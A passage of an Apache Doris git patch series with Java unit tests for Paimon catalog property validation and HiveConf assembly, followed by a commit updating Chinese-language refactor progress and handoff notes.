the - // file-base vs user-hive.* precedence under test. - Map fileKeys = new HashMap<>(); - fileKeys.put("hive.metastore.sasl.qop", "FILE-qop"); - HiveConf hc = PaimonCatalogFactory.buildHmsHiveConf(props( - "uri", "thrift://nn:9083", - "hive.metastore.sasl.qop", "USER-qop"), fileKeys, Collections.emptyMap()); - - // WHY: legacy precedence is file=base, user hive.* WINS. This can only pass if the file map is - // applied FIRST (as the base), then overridden by the verbatim user hive.* copy. MUTATION: - // applying the file map AFTER the user keys -> the file value "FILE-qop" wins -> red. - Assertions.assertEquals("USER-qop", hc.get("hive.metastore.sasl.qop"), - "a user hive.* prop must override the same key from the file base"); - } + public void assembleHiveConfAcceptsNullBase() { + // WHY: the dlf flavor has no hive.conf.resources base, so it passes null; assembleHiveConf must + // not NPE and must still apply the overrides. MUTATION: removing the null guard -> NPE -> red. + Map overrides = new HashMap<>(); + overrides.put("dlf.catalog.endpoint", "dlf-vpc.cn-hangzhou.aliyuncs.com"); - // --------------------------------------------------------------------- - // FIX-FECONF-STORAGE-PARITY — HMS username alias (P8-4) - // --------------------------------------------------------------------- + HiveConf hc = PaimonCatalogFactory.assembleHiveConf(null, overrides); - @Test - public void buildHmsHiveConfResolvesUsernameFromHiveMetastoreUsernameAlias() { - HiveConf hc = PaimonCatalogFactory.buildHmsHiveConf(props( - "uri", "thrift://nn:9083", - "hive.metastore.username", "hms-user"), Collections.emptyMap(), Collections.emptyMap()); - - // WHY (P8-4): legacy HMSBaseProperties binds the username from {hive.metastore.username, hadoop.username} - // and sets HADOOP_USER_NAME (= "hadoop.username"). Before the fix the connector only copied the literal - // hadoop.username, so a user who set ONLY hive.metastore.username had it land as an inert verbatim hive.* - // key and never reach hadoop.username (the UGI key). MUTATION: dropping the alias resolution -> null -> red. - Assertions.assertEquals("hms-user", hc.get("hadoop.username")); + Assertions.assertEquals("dlf-vpc.cn-hangzhou.aliyuncs.com", hc.get("dlf.catalog.endpoint")); } - @Test - public void buildHmsHiveConfUsernameAliasPriorityHiveMetastoreWins() { - HiveConf hc = PaimonCatalogFactory.buildHmsHiveConf(props( - "uri", "thrift://nn:9083", - "hive.metastore.username", "primary", - "hadoop.username", "secondary"), Collections.emptyMap(), Collections.emptyMap()); - - // WHY: legacy alias order lists hive.metastore.username FIRST, so it wins when both are set. - // MUTATION: reversing the priority (hadoop.username wins) -> red. - Assertions.assertEquals("primary", hc.get("hadoop.username")); - } } diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorValidatePropertiesTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorValidatePropertiesTest.java new file mode 100644 index 00000000000000..1db531225ae065 --- /dev/null +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorValidatePropertiesTest.java @@ -0,0 +1,207 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.paimon; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.HashMap; +import java.util.Map; + +/** + * CREATE-CATALOG property validation, exercised through the production entry point + * {@link PaimonConnectorProvider#validateProperties(Map)} (called by fe-core + * {@code PluginDrivenExternalCatalog.checkProperties}). + * + *

    P2-T03: validation moved from the hand-rolled {@code PaimonCatalogFactory.validate} to the shared + * {@code MetaStoreProviders.bind(props, {}).validate()}. The shared parsers restore the TRUE-legacy + * rules the paimon hand-copy had dropped, so CREATE CATALOG is now STRICTER (user decision Q1 = + * adopt the legacy-faithful validate): HMS {@code forbidIf(simple)}/{@code requireIf(kerberos)} on + * client principal+keytab, the DLF OSS-storage requirement enforced at CREATE (not catalog build), + * and REST case-sensitive {@code "dlf".equals(token.provider)}. These three are the net-new RED tests + * here; the rest pin the required-key rules that already existed. + */ +public class PaimonConnectorValidatePropertiesTest { + + private static final PaimonConnectorProvider PROVIDER = new PaimonConnectorProvider(); + + private static Map props(String... kv) { + Map m = new HashMap<>(); + for (int i = 0; i < kv.length; i += 2) { + m.put(kv[i], kv[i + 1]); + } + return m; + } + + private static void validate(Map props) { + PROVIDER.validateProperties(props); + } + + // --------------------------------------------------------------------- + // Required-key rules (pre-existing; retargeted to the provider entry point) + // --------------------------------------------------------------------- + + @Test + public void rejectsUnknownFlavor() { + // WHY: an unknown paimon.catalog.type must fail at CREATE CATALOG, not silently fall back to + // filesystem. Post-cutover the rejection is MetaStoreProviders.bind throwing (no provider + // supports it) rather than the old "Unknown paimon.catalog.type value: X" message; we assert + // only that CREATE fails (IllegalArgumentException), not the exact wording. + Assertions.assertThrows(IllegalArgumentException.class, + () -> validate(props("paimon.catalog.type", "bogus", "warehouse", "/wh"))); + } + + @Test + public void requiresWarehouseForFilesystem() { + Assertions.assertThrows(IllegalArgumentException.class, + () -> validate(props("paimon.catalog.type", "filesystem"))); + } + + @Test + public void requiresWarehouseForRest() { + // Legacy parity: AbstractPaimonProperties requires warehouse and PaimonRestMetaStoreProperties + // does NOT override it, so a REST catalog without warehouse is rejected. + Assertions.assertThrows(IllegalArgumentException.class, + () -> validate(props( + "paimon.catalog.type", "rest", + "paimon.rest.uri", "http://rest:8080"))); + } + + @Test + public void restDlfTokenProviderRequiresAkSk() { + // requireIf: token provider "dlf" (lower-case, the legacy case-sensitive value) needs the dlf + // access-key-id AND access-key-secret. warehouse supplied so this exercises the requireIf. + Assertions.assertThrows(IllegalArgumentException.class, + () -> validate(props( + "paimon.catalog.type", "rest", + "warehouse", "/wh", + "paimon.rest.uri", "http://rest:8080", + "paimon.rest.token.provider", "dlf"))); + } + + @Test + public void jdbcDriverUrlWithoutDriverClassFails() { + Assertions.assertThrows(IllegalArgumentException.class, + () -> validate(props( + "paimon.catalog.type", "jdbc", + "warehouse", "/wh", + "uri", "jdbc:mysql://db:3306/meta", + "paimon.jdbc.driver_url", "mysql.jar"))); + } + + @Test + public void dlfRequiresAccessKey() { + Assertions.assertThrows(IllegalArgumentException.class, + () -> validate(props( + "paimon.catalog.type", "dlf", + "warehouse", "/wh", + "dlf.secret_key", "sk", + "dlf.endpoint", "dlf.cn.aliyuncs.com"))); + } + + @Test + public void dlfRequiresEndpointOrRegion() { + IllegalArgumentException ex = Assertions.assertThrows(IllegalArgumentException.class, + () -> validate(props( + "paimon.catalog.type", "dlf", + "warehouse", "/wh", + "dlf.access_key", "ak", + "dlf.secret_key", "sk"))); + Assertions.assertTrue(ex.getMessage().contains("dlf.endpoint")); + } + + @Test + public void hmsRequiresUri() { + Assertions.assertThrows(IllegalArgumentException.class, + () -> validate(props( + "paimon.catalog.type", "hms", + "warehouse", "/wh"))); + } + + @Test + public void acceptsEachWellFormedFlavor() { + Assertions.assertDoesNotThrow(() -> validate( + props("paimon.catalog.type", "filesystem", "warehouse", "/wh"))); + Assertions.assertDoesNotThrow(() -> validate(props( + "paimon.catalog.type", "hms", "warehouse", "/wh", "hive.metastore.uris", "thrift://nn:9083"))); + Assertions.assertDoesNotThrow(() -> validate(props( + "paimon.catalog.type", "rest", "warehouse", "/wh", "paimon.rest.uri", "http://rest:8080"))); + Assertions.assertDoesNotThrow(() -> validate(props( + "paimon.catalog.type", "jdbc", "warehouse", "/wh", "uri", "jdbc:mysql://db:3306/meta"))); + // DLF now requires an OSS storage key at CREATE (see rejectsDlfWithoutOssStorage), so a + // well-formed DLF catalog carries one. + Assertions.assertDoesNotThrow(() -> validate(props( + "paimon.catalog.type", "dlf", "warehouse", "/wh", + "dlf.access_key", "ak", "dlf.secret_key", "sk", "dlf.region", "cn-hangzhou", + "oss.endpoint", "oss-cn-hangzhou.aliyuncs.com"))); + } + + @Test + public void defaultsToFilesystemWhenTypeAbsent() { + Assertions.assertDoesNotThrow(() -> validate(props("warehouse", "/wh"))); + Assertions.assertThrows(IllegalArgumentException.class, + () -> validate(props("not-a-type", "x"))); + } + + // --------------------------------------------------------------------- + // Net-new legacy-faithful tightening (Q1) — RED against the old loose validate + // --------------------------------------------------------------------- + + @Test + public void hmsKerberosRequiresPrincipalAndKeytab() { + // requireIf(kerberos): legacy HMSBaseProperties.buildRules mandates the client principal AND + // keytab when the HMS auth type is kerberos. The paimon hand-copy dropped this rule; the shared + // parser restores it (HmsMetaStorePropertiesImpl.validate). MUTATION: dropping requireIf -> green + // (no throw) -> test red. + Assertions.assertThrows(IllegalArgumentException.class, + () -> validate(props( + "paimon.catalog.type", "hms", + "warehouse", "/wh", + "hive.metastore.uris", "thrift://nn:9083", + "hive.metastore.authentication.type", "kerberos"))); + } + + @Test + public void hmsSimpleForbidsPrincipalAndKeytab() { + // forbidIf(simple): legacy forbids a client principal/keytab when the auth type is simple + // (case-SENSITIVE Objects.equals). Restored by the shared parser. RED against the old validate. + Assertions.assertThrows(IllegalArgumentException.class, + () -> validate(props( + "paimon.catalog.type", "hms", + "warehouse", "/wh", + "hive.metastore.uris", "thrift://nn:9083", + "hive.metastore.authentication.type", "simple", + "hive.metastore.client.principal", "hive/_HOST@REALM"))); + } + + @Test + public void rejectsDlfWithoutOssStorage() { + // Legacy PaimonAliyunDLFMetaStoreProperties selected an OSS/OSS_HDFS StorageProperties; a DLF + // catalog backed by non-OSS (or no) object storage is rejected. The hand-copy enforced this only + // at catalog BUILD (requireOssStorageForDlf); the shared parser enforces it in validate() so it + // now fails at CREATE CATALOG. RED against the old validate (which did not check storage). + IllegalArgumentException ex = Assertions.assertThrows(IllegalArgumentException.class, + () -> validate(props( + "paimon.catalog.type", "dlf", + "warehouse", "/wh", + "dlf.access_key", "ak", + "dlf.secret_key", "sk", + "dlf.endpoint", "dlf.cn.aliyuncs.com"))); + Assertions.assertTrue(ex.getMessage().contains("OSS storage")); + } +} From 8b678cbe92bf5d6ea734b163285f5590438dbaa3 Mon Sep 17 00:00:00 2001 From: morningman Date: Thu, 18 Jun 2026 18:48:54 +0800 Subject: [PATCH 095/128] =?UTF-8?q?docs(storage-refactor):=20P2-T03=20?= =?UTF-8?q?=E2=80=94=20record=20commit=20ref=203c1e118dcfa?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit P2-T03 (paimon adapter cutover to shared metastore-spi) done. Flip tasks.md to ✅, update PROGRESS/HANDOFF (next = P2-T04 pom+gate, then P2-T05 docker), record D-014 (adopt legacy-faithful validate), D-015 (keep JDBC registration in connector), and DV-008 (alias arrays only partially deletable + bind supersedes parse + assembleHiveConf). Co-Authored-By: Claude Opus 4.8 (1M context) --- .../metastore-storage-refactor/HANDOFF.md | 32 +++++++++---------- .../metastore-storage-refactor/PROGRESS.md | 6 ++-- .../decisions-log.md | 14 ++++++++ .../deviations-log.md | 9 ++++++ plan-doc/metastore-storage-refactor/tasks.md | 10 ++++-- 5 files changed, 50 insertions(+), 21 deletions(-) diff --git a/plan-doc/metastore-storage-refactor/HANDOFF.md b/plan-doc/metastore-storage-refactor/HANDOFF.md index 29590dd3860ba6..6cb3ec916aed1e 100644 --- a/plan-doc/metastore-storage-refactor/HANDOFF.md +++ b/plan-doc/metastore-storage-refactor/HANDOFF.md @@ -7,10 +7,12 @@ --- -**更新时间**:2026-06-18(实现 session:**P2-T02 ✅ 新建 fe-connector-metastore-spi**[5 后端解析器 + Provider SPI/ServiceLoader];下一步 = **P2-T03**[paimon adapter 改走共享解析器]) +**更新时间**:2026-06-18(实现 session:**P2-T03 ✅ paimon adapter cutover 到共享 metastore-spi**[commit `3c1e118dcfa`];下一步 = **P2-T04**[paimon pom + gate 核对],然后 **P2-T05** docker 真闸) **更新人**:Claude(Opus 4.8) > **本 session P2 进度补注(最新在最前)**: +> - **P2-T03 ✅(commit `3c1e118dcfa`)**:paimon 元存储**连接逻辑** cutover 到 P2-T02 建的共享 spi(paimon SDK Options 组装 + filesystem/jdbc 存储 Configuration **留连接器**,非连接事实)。**2 边界经 AskUserQuestion 定**:**D-014**(采用 spi 的 **legacy-faithful validate**——CREATE CATALOG 比当前 paimon 更严:HMS case-sensitive forbidIf(simple)/requireIf(kerberos)、REST case-sensitive `"dlf".equals`、DLF 在 CREATE 要求 OSS;故意向真 legacy 收敛)、**D-015**(JDBC **注册副作用留连接器**,仅纯 `resolveDriverUrl` 共享;不下移=单消费方+守 spi SDK/JVM-free,Rule 2)。**改动**(白名单内 5 main+2 test+pom,净 +318/−847):`validateProperties`→`MetaStoreProviders.bind(props,{}).validate()`;`createCatalog` HMS/DLF→`bind`+新薄 `PaimonCatalogFactory.assembleHiveConf(base,overrides)`(HMS seed `ctx.loadHiveConfResources` base 再叠 `toHiveConfOverrides`;DLF `assembleHiveConf(null,toDlfCatalogConf())`)、删 build-time `requireOssStorageForDlf`;两处 driver-url→`JdbcDriverSupport.resolveDriverUrl`;`PaimonCatalogFactory` 删 6 法+`KNOWN_FLAVORS`+加 `assembleHiveConf`;`PaimonConnectorProperties` 删 `DLF_*`/`REST_TOKEN_PROVIDER`/`REST_DLF_*`(**DV-008**:别名数组只**部分**删——`HMS_URI`/`REST_URI`/`JDBC_*` 仍被保留的 `buildCatalogOptions` 用)。**TDD**:新 `PaimonConnectorValidatePropertiesTest` 13/0(3 tightening RED→GREEN 实证)+ 删 28 旧 builder/validate 测(content parity 已由 spi `Hms/DlfMetaStorePropertiesTest` 13+7 覆盖)+ 2 `assembleHiveConf` 测(F2 layering)。**验证 paimon 全模块 278/0/1skip**(skip=live gated)、checkstyle 0、import-gate 0、白名单干净。**recon `wf_9437dd4e-06d`** verify=SOUND/READY(逐键 parity 通过);**对抗 review `wf_dd78ec4b-da5`** verify=READY/0 真 finding(唯一 MAJOR「kerberos.principal alias 未测」证伪=该键走 verbatim passthrough→测它恒真 tautology 违 Rule 9;隔离 binding 的 `service.principal`→`kerberos.principal` 方向已被 spi line72/80 覆盖)。⚠️ **docker e2e 未跑**(HMS/DLF live metastore=hive + 插件 zip ServiceLoader 发现 5 provider 在子优先 loader=P2-T05 真闸)。 +> - **决策补**:D-014(采用 legacy-faithful validate)|D-015(JDBC 注册留连接器)|DV-008(别名数组部分删 + `bind` 取代 `parse` + 新 `assembleHiveConf` 助手)。 > - **P2-T02 ✅(commit `7ea63528bc4`)**:新建 `fe-connector-metastore-spi`(22 文件 = 15 main + 7 test)。**3 边界经 AskUserQuestion 定**:**DV-006**(fe-kerberos = compile-dep only,**零新代码**——recon 三重证伪 HANDOFF 旧写「增量补 authenticator 机制」:产出 `KerberosAuthSpec` 纯 String→值对象不需 hadoop,真 doAs 留 FE 侧 `ctx.executeAuthenticated`)、**DV-007**(parser storage 入参 = 中立 `Map storageHadoopConfig`,**非** `List`;spi **不**依赖 fe-filesystem-api,保持 hadoop/fs-free;parser 拥有 storage-overlay 以守 kerberos-after-storage 序)、全 5 后端一次 commit。**内容**:`MetaStoreProvider

    extends PluginFactory`(`supports`+abstract `bind(props,storageHadoopConfig)`)+ `MetaStoreProviders.bind` first-hit ServiceLoader 派发 + `MetaStoreParseUtils`(firstNonBlank/copyIfPresent/applyStorageConfig/matchedProperties + `CATALOG_TYPE_KEY=paimon.catalog.type`)+ `JdbcDriverSupport.resolveDriverUrl`(**仅纯 resolver**;driver 注册/DriverShim JVM 副作用无调用方 → 留 P2-T03,Rule 2)+ `AbstractMetaStoreProperties`(共享 raw/warehouse/matchedProperties)+ 5 `*MetaStorePropertiesImpl`(`@ConnectorProperty` 绑定,消灭 `PaimonConnectorProperties` 手抄别名)+ 5 provider(`sensitivePropertyKeys` 暴露 sensitive 键,镜像 `S3FileSystemProvider`)+ 单 `META-INF/services`(5 行)。pom = metastore-api + fe-extension-spi + fe-foundation + fe-kerberos + commons-lang3(copy-plugin-deps phase=none)。**来源 = 上移 paimon `PaimonCatalogFactory` 手抄逻辑去 fe-core 化**(HiveConf→中立 Map、authenticator→facts);**fe-core 旧 `Paimon*MetaStoreProperties` 不动**。**HMS D-4 补回** legacy `HMSBaseProperties.buildRules` 的 forbidIf-simple/requireIf-kerberos(paimon 手抄 validate 漏;**CASE-SENSITIVE `Objects.equals` 对齐 ParamRules**,与 `buildHmsHiveConf` 的 `equalsIgnoreCase` 不对称**保留**)。验证:spi **41/0**、checkstyle 0、import-gate exit 0、无 fe-core 禁包 import、白名单干净、**3 mutation RED→GREEN**(HMS 大小写敏感·kerberos-after-storage clobber·REST 大小写敏感)。**对抗 review `wf_2ddae04d-cf9`(4 lens + verify)**:0 BLOCKER;真 MAJOR=**REST token-provider `equalsIgnoreCase`→`"dlf".equals`**(paimon 手抄 latent bug,legacy ParamRules 才权威)已修;FS `supports()` 改 `type==null||equalsIgnoreCase`(去 trim 不对称 + 对齐 legacy reject-on-malformed);trim/accessPublic-proxyMode divergence 经核证「对齐权威 legacy contract、仅偏离非权威 paimon 手抄」→不改;补 12 测(storage re-key/clobber-via-storage-channel/alias-first-wins/username-overlay/DLF-S3-reject/dispatch-instanceof…)。**API 旁改 2 javadoc**(`getDriverUrl`「raw,consumer-resolves」+ `needsStorage` FS 准确性,诚实订正,白名单内)。⚠️ **docker 未跑**(T2 真闸 P2-T05)。 > - **决策补**:D-013(fe-kerberos 先建)|DV-006(kerberos compile-dep-only)|DV-007(storage 中立 Map,spi 不依赖 fe-filesystem-api)。 > - **P2-T01 ✅(commit `44d1fec4dcb`)**:新建 `fe-connector-metastore-api`(`org.apache.doris.connector.metastore`)= `MetaStoreProperties`(`providerName()`+能力方法 `needsStorage()`/`needsVendedCredentials()` 默认 false+`validate()` no-op+`rawProperties()`/`matchedProperties()`,**无 `MetaStoreType` 枚举** D-006)+ 5 子接口 HMS/DLF/REST/JDBC/FileSystem(中立 Map/标量;`HmsMetaStoreProperties` 用 fe-kerberos `AuthType`+`Optional`)。**依赖仅 fe-kerberos**(D-013;fe-foundation/fe-filesystem-api api 纯接口未用→留 spi)。pom 镜像 fe-connector-api(copy-plugin-deps none);注册 fe-connector/pom.xml。**未建 Glue/S3Tables**(留扩展)。`MetaStorePropertiesContractTest` 3/0、checkstyle 0、import-gate exit 0、无 fe-core 禁包 import。 @@ -54,24 +56,21 @@ ## 当前状态 -- 阶段:Research ✅ / Design ✅(**13 决策 D-001..D-013**)/ **Implement 🚧(P1 storage 5/6 P1-T06 docker 推迟[D-012];P2: 2/5 = P2-T01 + P2-T02 ✅;P3a facts-carrier ✅)**。 -- 任务计数 **10/14**(P0: 2/2 ✅ | P1: 5/6,**P1-T06 推迟** | **P2: 2/5(P2-T01 + P2-T02 ✅)** | P3a: 0/1,facts-carrier 切片 ✅ 机制待续[DV-006 推迟到 P3b])| follow-up FU-T01/02/03 ✅| P3b 占位。 -- **新增 3 模块**:顶层叶子 `fe-kerberos`(facts 切片)+ `fe-connector-metastore-api`(5 子接口)+ **`fe-connector-metastore-spi`(5 解析器 + Provider SPI,22 文件)**。**R-006/R-007/R-008 已闭环**(UT/mutation 层)。 +- 阶段:Research ✅ / Design ✅(**15 决策 D-001..D-015**)/ **Implement 🚧(P1 storage 5/6 P1-T06 docker 推迟[D-012];P2: 3/5 = P2-T01 + P2-T02 + P2-T03 ✅;P3a facts-carrier ✅)**。 +- 任务计数 **11/14**(P0: 2/2 ✅ | P1: 5/6,**P1-T06 推迟** | **P2: 3/5(P2-T01 + P2-T02 + P2-T03 ✅)** | P3a: 0/1,facts-carrier 切片 ✅ 机制待续[DV-006 推迟到 P3b])| follow-up FU-T01/02/03 ✅| P3b 占位。 +- **新增 3 模块**:顶层叶子 `fe-kerberos`(facts 切片)+ `fe-connector-metastore-api`(5 子接口)+ `fe-connector-metastore-spi`(5 解析器 + Provider SPI,22 文件)。**paimon 连接器已 cutover 到共享 spi**(P2-T03:连接逻辑走 `MetaStoreProviders.bind`,手抄 `build*HiveConf`/`validate`/`resolveDriverUrl`/别名数组已删)。**R-006/R-007/R-008 已闭环**(UT/mutation 层)。 - ⚠️ **e2e/docker 全程未跑**(P1 storage 等价 T1 + P2 metastore T2/5-flavor 闸 一并留 P2-T05 docker 跑;D-012)。 -## 下一步(明确):P2-T03(paimon adapter 改走共享解析器) +## 下一步(明确):P2-T04(paimon pom + gate 核对),然后 P2-T05(docker 真闸) > **务必先按顶部流程:读文档 + 对照真实代码 review 方案再动手;实施前 WORKFLOW §2 单任务 TDD + 一句话复述。** -> ⚠️ **P2-T03 触碰 `fe-connector-paimon/**`(白名单内);这是「cutover」——比 P2-T02「纯新增」风险高,必先对照真实 `PaimonConnector.createCatalog` 流 + 现有 292+ paimon UT 兜底。** - -**P2-T03(`PaimonCatalogFactory`/`PaimonConnector` 改调共享 `MetaStoreProviders.bind(raw, storageHadoopConfig)` 拿 facts + 薄 paimon Options/HiveConf 组装;删手抄 `buildHmsHiveConf`/`buildDlfHiveConf`/`validate`/`PaimonConnectorProperties` 别名数组/`resolveDriverUrl`)**: -- **共享 spi 已就绪**(P2-T02):`MetaStoreProviders.bind(props, storageHadoopConfig)` → `MetaStoreProperties`;连接器 `instanceof HmsMetaStoreProperties/DlfMetaStoreProperties/...` 本地分支组装 paimon SDK catalog(设计 §3.3)。storage 由连接器现有 `PaimonConnector.buildStorageHadoopConfig()`(`ctx.getStorageProperties()→toHadoopConfigurationMap()`)算好喂入(DV-007)。 -- **P2-T02 review 揪出、P2-T03 必接(载于 tasks.md P2-T02 块)**: - 1. **hive.conf.resources base(F2)**:SPI `HmsMetaStoreProperties.toHiveConfOverrides()` **只产 overrides**,不含外部 hive-site.xml base。连接器须 `new HiveConf()` → `ctx.loadHiveConfResources(raw.get("hive.conf.resources")).forEach(hc::set)`(base)→ 再 `toHiveConfOverrides().forEach(hc::set)`(覆盖)。**漏则外部 hive-site.xml 静默丢**。 - 2. **HMS doAs 消费契约**:FE doAs / `executeAuthenticated` 须看 `hms.kerberos()`(非 `getAuthType()`)——HDFS-fallback 时 `getAuthType()==SIMPLE` 但 `kerberos().isPresent()`。 - 3. **driver 注册下移**:P2-T02 只移了纯 `JdbcDriverSupport.resolveDriverUrl`;live `DriverManager.registerDriver`+`DriverShim`+静态 cache(JVM 副作用)仍在 `PaimonConnector`,P2-T03 决定下移与否(连接器调 `resolveDriverUrl` 后注册)。两消费方 `PaimonConnector` + `PaimonScanPlanProvider.getBackendPaimonOptions` 都要改导入。 -- **现场 recon 必做**:①设计 §3.3(adapter 样例,权威);②真实代码 `PaimonConnector.createCatalog`:128-236 / `createCatalogFromContext`(thread-CL pin + `executeAuthenticated`)+ `PaimonCatalogFactory` 现有 `buildCatalogOptions`/`appendXxxOptions`(**SDK 侧,留**);③P2-T02 spi 接口签名(`MetaStoreProviders.bind`、`HmsMetaStoreProperties.toHiveConfOverrides()/kerberos()`、`DlfMetaStoreProperties.toDlfCatalogConf()`、`RestMetaStoreProperties.toRestOptions()`、`JdbcMetaStoreProperties.getXxx()`、`FileSystemMetaStoreProperties.getWarehouse()`)。 -- **T2 等价性**(设计 §5):cutover 后 paimon 5 flavor UT 全绿 + adapter 不再含手抄连接逻辑(行数显著降);真闸 docker P2-T05。 -- **白名单**:`fe-connector-paimon/**` + `fe-connector-metastore-spi/**`(如需微调)+ `fe-connector-paimon/pom.xml`(加 metastore-api/spi 依赖)。**fe-core 旧 `Paimon*MetaStoreProperties` 不动。** + +**P2-T04(paimon pom + gate 核对)**: +- **做什么**:核 `fe-connector-paimon/pom.xml` 依赖集 = `fe-connector-{api,spi}` + **`fe-connector-metastore-spi`(P2-T03 已加,transitively 带 metastore-api + fe-kerberos)** + `fe-filesystem-api` + `fe-thrift(provided)` + paimon SDK + hadoop/aws/…;`grep` 确认 paimon 无 fe-core import(`org.apache.doris.{catalog,common,datasource,qe,analysis,nereids,planner}`);`tools/check-connector-imports.sh` PASS(P2-T03 已验 exit 0,复核即可)。 +- **⚠️ P2-T03 recon 揪出、P2-T04/T05 必核(packaging)**:**插件 zip 必须含 metastore-spi 的 `META-INF/services/org.apache.doris.connector.metastore.spi.MetaStoreProvider`(5 行)**,否则运行时 `MetaStoreProviders.load()` 经 ServiceLoader 在**子优先插件 loader** 下发现不到 5 provider → `bind` 抛「No MetaStoreProvider supports」→ 所有 paimon CREATE/读 挂。UT(单 flat loader)已证 services 可发现(278/0),但 **plugin-zip 子优先 loader 是 docker-gated**。核 paimon 的 assembly/copy-plugin-deps 是否把 metastore-spi(含 services 文件 + 其 transitive metastore-api/fe-kerberos)打进 zip。 +- **依赖**:P2-T03 ✅。设计 §4 P2-4。 + +**P2-T05(docker 真闸,合并 P1-T06 的 T1 + P2 的 T2)**:paimon 5 flavor(filesystem/hms/rest/jdbc/dlf)+ vended(REST/DLF) + Kerberos HMS,`enablePaimonTest=true`。**P2-T03 未离线验的**:①HMS/DLF live `metastore=hive`(IMetaStoreClient 从 host hive-catalog-shade 解析 + 子优先 Configuration/HiveConf 跨 loader identity 危害,见 `PaimonConnector` HMS/DLF 分支 NOTE);②上面 P2-T04 的 plugin-zip ServiceLoader 发现;③T1 storage 等价(S3/OSS/COS/OBS/HDFS + 无凭据对象存储 + 调优默认)。**D-014 行为变更**(CREATE 更严)也在此真验。 +- **依赖**:P2-T03 ✅, P2-T04。设计 §4 P2-5 / §5 T2,T4。 ## 未决 / 需注意 - ✅ 已闭环:R-006(FU-T03)、R-007(FU-T01)、R-008(FU-T02)。 @@ -82,6 +81,7 @@ ## 红线提醒(WORKFLOW §4) - **可动**(白名单):`fe-connector-metastore-api/**` + **`fe-connector-metastore-spi/**`(新建)** + `fe-kerberos/**`(新建叶子)、`fe-connector-paimon/**`、`fe-connector-spi/**`、fe-core **仅** `connector/DefaultConnectorContext.java` + `fs/FileSystemPluginManager.java` + `fs/FileSystemFactory.java`(均**仅新增方法 / 对本项目所加方法的微改+注释**)、**`fe-filesystem/fe-filesystem-hdfs/**`(D-010,FU-T01)**、**`fe-filesystem/fe-filesystem-{s3,oss,cos,obs}/**`(D-011,FU-T02/FU-T03;main+test)**、相关 pom(`fe-connector/pom.xml`/`fe/pom.xml` 仅新增模块声明)、本跟踪目录。 - **P2-T02 额外触碰**(透明,白名单内):`fe-connector-metastore-api` 的 `MetaStoreProperties.java`/`JdbcMetaStoreProperties.java` 各 1 处 javadoc 诚实订正(`needsStorage` FS 准确性 + `getDriverUrl` raw 语义)——非改契约方法签名。 +- **P2-T03 触碰**(透明,白名单内):`fe-connector-paimon/**` 5 main(`PaimonConnectorProvider`/`PaimonConnector`/`PaimonCatalogFactory`/`PaimonConnectorProperties`/`PaimonScanPlanProvider`)+ 2 test + `fe-connector-paimon/pom.xml`(加 `fe-connector-metastore-spi` 依赖,属 `fe-connector-paimon/**`)。**fe-core 旧 `Paimon*MetaStoreProperties` 不动;metastore-spi/api 未改**(只新增消费方)。 - **禁碰**:fe-core `datasource.property.{storage,metastore}` 包、构造点 `PluginDrivenExternalCatalog`、其它连接器(hive/hudi/iceberg/es/jdbc/mc/trino)、**其它 fe-filesystem 模块**(`-{api,spi,azure,broker,local}`,含其 test——R-008 若须给 api/spi 加共享 credentials-provider-type 须先 AskUserQuestion)、`fe-property` 模块删除。 - **FU-T01 额外触碰**(已记 D-010 + tasks,透明):fe-core `FileSystemFactory.java`(F1 +1 行 setProperty,项目 P1-T02 加的方法)、`FileSystemPluginManager.java`(bindAll javadoc,项目 P0-T02 加的方法)、fe-connector-paimon `PaimonScanPlanProvider.java`(注释)——均 project-owned 微改/注释,非碰 pre-existing fe-core 方法。 - paimon 连接器 + fe-filesystem-hdfs **允许** import `org.apache.doris.foundation.*`(fe-foundation 叶子)、`org.apache.doris.filesystem.*`;**禁** import fe-core/fe-connector(fe-filesystem 侧 gate)。 diff --git a/plan-doc/metastore-storage-refactor/PROGRESS.md b/plan-doc/metastore-storage-refactor/PROGRESS.md index ce757b88d0f73c..db5434c3e6e15c 100644 --- a/plan-doc/metastore-storage-refactor/PROGRESS.md +++ b/plan-doc/metastore-storage-refactor/PROGRESS.md @@ -10,13 +10,14 @@ |---|---|---| | Research(调研) | ██████████ 100% | ✅ 完成(8-agent + grep;+ 3-agent recon 复核 D-006/7/8) | | Design(设计) | ██████████ 100% | ✅ 完成(设计文档 + **7 决策** D-001..D-008,范围已收窄) | -| **Implement(实现)** | ████████░░ ~60% | 🚧 **进行中**(P0 ✅;P1 5/6 P1-T06 推迟[D-012];**P2 2/5 = P2-T01+P2-T02 ✅**;P3a facts 切片 ✅) | +| **Implement(实现)** | █████████░ ~72% | 🚧 **进行中**(P0 ✅;P1 5/6 P1-T06 推迟[D-012];**P2 3/5 = P2-T01+P2-T02+P2-T03 ✅**;P3a facts 切片 ✅) | -任务计数:**10 / 14** 完成(P0: 2/2 ✅ | P1: 5/6,**P1-T06 推迟** | **P2: 2/5(P2-T01 + P2-T02 ✅)** | P3a: facts 切片 ✅ 机制待续)| + FU-T01/02/03 ✅、P3b 占位。**下一步 = P2-T03**(paimon adapter 改走共享解析器)。 +任务计数:**11 / 14** 完成(P0: 2/2 ✅ | P1: 5/6,**P1-T06 推迟** | **P2: 3/5(P2-T01 + P2-T02 + P2-T03 ✅)** | P3a: facts 切片 ✅ 机制待续)| + FU-T01/02/03 ✅、P3b 占位。**下一步 = P2-T04**(paimon pom + gate 核对,⚠️ 核 plugin-zip 含 metastore-spi 的 META-INF/services),然后 **P2-T05** docker 真闸。 --- ## 当前活跃 task +- **P2-T03 ✅ 完成(2026-06-18,commit `3c1e118dcfa`)**:paimon adapter cutover 到共享 metastore-spi。下一步 